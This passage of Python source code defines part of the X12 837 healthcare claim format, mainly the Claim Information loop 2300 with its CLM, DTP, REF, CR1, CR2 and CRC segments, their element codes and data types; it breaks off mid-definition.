desc="Product/Service ID Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=9, codes=["ER", "HC", "IV", "WK"], ), ), Element( "HCP10", Properties( desc="Product/Service ID", req_sit="S", data_type=("AN", "1", "48"), position=10, codes=[], ), ), Element( "HCP11", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=11, codes=["MJ", "UN"], ), ), Element( "HCP12", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=12, codes=[], ), ), Element( "HCP13", Properties( desc="Reject Reason Code", req_sit="S", data_type=("ID", "2", "2"), position=13, codes=["T1", "T2", "T3", "T4", "T5", "T6"], ), ), Element( "HCP14", Properties( desc="Policy Compliance Code", req_sit="S", data_type=("ID", "1", "2"), position=14, codes=["1", "2", "3", "4", "5"], ), ), Element( "HCP15", Properties( desc="Exception Code", req_sit="S", data_type=("ID", "1", "2"), position=15, codes=["1", "2", "3", "4", "5", "6"], ), ), ), parsed_837_2410, parsed_837_2420A, parsed_837_2420B, parsed_837_2420C, parsed_837_2420D, parsed_837_2420E, parsed_837_2420F, parsed_837_2420G, parsed_837_2420H, parsed_837_2430, parsed_837_2440, ) parsed_837_2300 = Loop( "2300", Properties( desc="Claim Information", looptype="", position="1300", repeat="100", req_sit="R", ), Segment( "CLM", Properties( desc="Claim Information", position="1300", repeat="1", req_sit="R", syntax="", ), Element( "CLM01", Properties( desc="Claim Submitter's Identifier", req_sit="R", data_type=("AN", "1", "38"), position=1, codes=[], ), ), Element( "CLM02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "CLM03", Properties( desc="Claim Filing Indicator Code", req_sit="N", data_type=("ID", "1", "2"), position=3, codes=[], ), ), Element( "CLM04", Properties( desc="Non-Institutional Claim Type Code", req_sit="N", data_type=("ID", "1", "2"), position=4, codes=[], ), ), Composite( "C023", Properties( desc="Health Care Service Location Information", refdes="", repeat="", req_sit="R", seq="05", ), Element( "CLM05-01", Properties( desc="Facility Code Value", req_sit="R", data_type=("AN", "1", "2"), position=0, codes=[], ), ), Element( "CLM05-02", Properties( desc="Facility Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["B"], ), ), Element( "CLM05-03", Properties( desc="Claim Frequency Type Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=[], ), ), ), Element( "CLM06", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["N", "Y"], ), ), Element( "CLM07", Properties( desc="Provider Accept Assignment Code", req_sit="R", data_type=("ID", "1", "1"), position=7, codes=["A", "B", "C"], ), ), Element( "CLM08", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=8, codes=["N", "W", "Y"], ), ), Element( "CLM09", Properties( desc="Release of Information Code", req_sit="R", data_type=("ID", "1", "1"), position=9, codes=["I", "Y"], ), ), Element( "CLM10", Properties( desc="Patient Signature Source Code", req_sit="S", data_type=("ID", "1", "1"), position=10, codes=["P"], ), ), Composite( "C024", Properties( desc="Related Causes Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "CLM11-01", Properties( desc="Related-Causes Code", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["AA", "EM", "OA"], ), ), Element( "CLM11-02", Properties( desc="Related-Causes Code", req_sit="S", data_type=("ID", "2", "3"), position=1, codes=["AA", "EM", "OA"], ), ), Element( "CLM11-03", Properties( desc="Related-Causes Code", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "CLM11-04", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "CLM11-05", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), ), Element( "CLM12", Properties( desc="Special Program Code", req_sit="S", data_type=("ID", "2", "3"), position=12, codes=["02", "03", "05", "09"], ), ), Element( "CLM13", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=13, codes=[], ), ), Element( "CLM14", Properties( desc="Level of Service Code", req_sit="N", data_type=("ID", "1", "3"), position=14, codes=[], ), ), Element( "CLM15", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=15, codes=[], ), ), Element( "CLM16", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=16, codes=[], ), ), Element( "CLM17", Properties( desc="Claim Status Code", req_sit="N", data_type=("ID", "1", "2"), position=17, codes=[], ), ), Element( "CLM18", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=18, codes=[], ), ), Element( "CLM19", Properties( desc="Claim Submission Reason Code", req_sit="N", data_type=("ID", "2", "2"), position=19, codes=[], ), ), Element( "CLM20", Properties( desc="Delay Reason Code", req_sit="S", data_type=("ID", "1", "2"), position=20, codes=["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "15"], ), ), ), Segment( "DTP", Properties( desc="Date - Onset of Current Illness or Symptom", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["431"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Initial Treatment Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["454"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Seen Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["304"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Acute Manifestation", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["453"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Accident", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["439"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Menstrual Period", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["484"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last X-ray Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["455"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Hearing and Vision Prescription Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["471"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Disability Dates", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["314", "360", "361"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8", "RD8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Worked", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["297"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Authorized Return to Work", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["296"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Admission", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["435"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Discharge", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["096"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Assumed and Relinquished Care Dates", position="1350", repeat="2", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["090", "091"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Property and Casualty Date of First Contact", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["444"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Repricer Received Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["050"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "PWK", Properties( desc="Claim Supplemental Information", position="1550", repeat="10", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "03", "04", "05", "06", "07", "08", "09", "10", "11", "13", "15", "21", "A3", "A4", "AM", "AS", "B2", "B3", "B4", "BR", "BS", "BT", "CB", "CK", "CT", "D2", "DA", "DB", "DG", "DJ", "DS", "EB", "HC", "HR", "I5", "IR", "LA", "M1", "MT", "NN", "OB", "OC", "OD", "OE", "OX", "OZ", "P4", "P5", "PE", "PN", "PO", "PQ", "PY", "PZ", "RB", "RR", "RT", "RX", "SG", "V5", "XP", ], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AA", "BM", "EL", "EM", "FT", "FX"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=5, codes=["AC"], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "CN1", Properties( desc="Contract Information", position="1600", repeat="1", req_sit="S", syntax="", ), Element( "CN101", Properties( desc="Contract Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["01", "02", "03", "04", "05", "06", "09"], ), ), Element( "CN102", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "CN103", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=3, codes=[], ), ), Element( "CN104", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "CN105", Properties( desc="Terms Discount Percent", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), Element( "CN106", Properties( desc="Version Identifier", req_sit="S", data_type=("AN", "1", "30"), position=6, codes=[], ), ), ), Segment( "AMT", Properties( desc="Patient Amount Paid", position="1750", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["F5"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Authorization Exception Code", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["4N"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mandatory Medicare (Section 4081) Crossover Indicator", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F5"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mammography Certification Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EW"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referral Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Prior Authorization", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Payer Claim Control Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F8"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Clinical Laboratory Improvement Amendment (CLIA) Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["X4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Repriced Claim Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9A"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Adjusted Repriced Claim Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9C"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Investigational Device Exemption Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["LX"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Claim Identifier For Transmission Intermediaries", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["D9"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Medical Record Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EA"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Demonstration Project Identifier", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["P4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Care Plan Oversight", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["1J"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "K3", Properties( desc="File Information", position="1850", repeat="10", req_sit="S", syntax="", ), Element( "K301", Properties( desc="Fixed Format Information", req_sit="R", data_type=("AN", "1", "80"), position=1, codes=[], ), ), Element( "K302", Properties( desc="Record Format Code", req_sit="N", data_type=("ID", "1", "2"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), ), Segment( "NTE", Properties( desc="Claim Note", position="1900", repeat="1", req_sit="S", syntax="" ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["ADD", "CER", "DCP", "DGN", "TPO"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "CR1", Properties( desc="Ambulance Transport Information", position="1950", repeat="1", req_sit="S", syntax="P0102 P0506", ), Element( "CR101", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=1, codes=["LB"], ), ), Element( "CR102", Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CR103", Properties( desc="Ambulance Transport Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), Element( "CR104", Properties( desc="Ambulance Transport Reason Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["A", "B", "C", "D", "E"], ), ), Element( "CR105", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=5, codes=["DH"], ), ), Element( "CR106", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR107", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=7, codes=[], ), ), Element( "CR108", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=8, codes=[], ), ), Element( "CR109", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=9, codes=[], ), ), Element( "CR110", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), ), Segment( "CR2", Properties( desc="Spinal Manipulation Service Information", position="2000", repeat="1", req_sit="S", syntax="P0102 C0403 P0506", ), Element( "CR201", Properties( desc="Count", req_sit="N", data_type=("N0", "1", "9"), position=1, codes=[], ), ), Element( "CR202", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=2, codes=[], ), ), Element( "CR203", Properties( desc="Subluxation Level Code", req_sit="N", data_type=("ID", "2", "3"), position=3, codes=[], ), ), Element( "CR204", Properties( desc="Subluxation Level Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CR205", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=5, codes=[], ), ), Element( "CR206", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR207", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CR208", Properties( desc="Nature of Condition Code", req_sit="R", data_type=("ID", "1", "1"), position=8, codes=["A", "C", "D", "E", "F", "G", "M"], ), ), Element( "CR209", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=9, codes=[], ), ), Element( "CR210", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), Element( "CR211", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=11, codes=[], ), ), Element( "CR212", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=12, codes=[], ), ), ), Segment( "CRC", Properties( desc="Ambulance Certification", position="2200", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["07"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), ), Segment( "CRC", Properties( desc="Patient Condition Information: Vision", position="2200", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["E1", "E2", "E3"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["L1", "L2", "L3", "L4", "L5"], ), ), ), Segment( "CRC", Properties( desc="Homebound Indicator", position="2200", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", 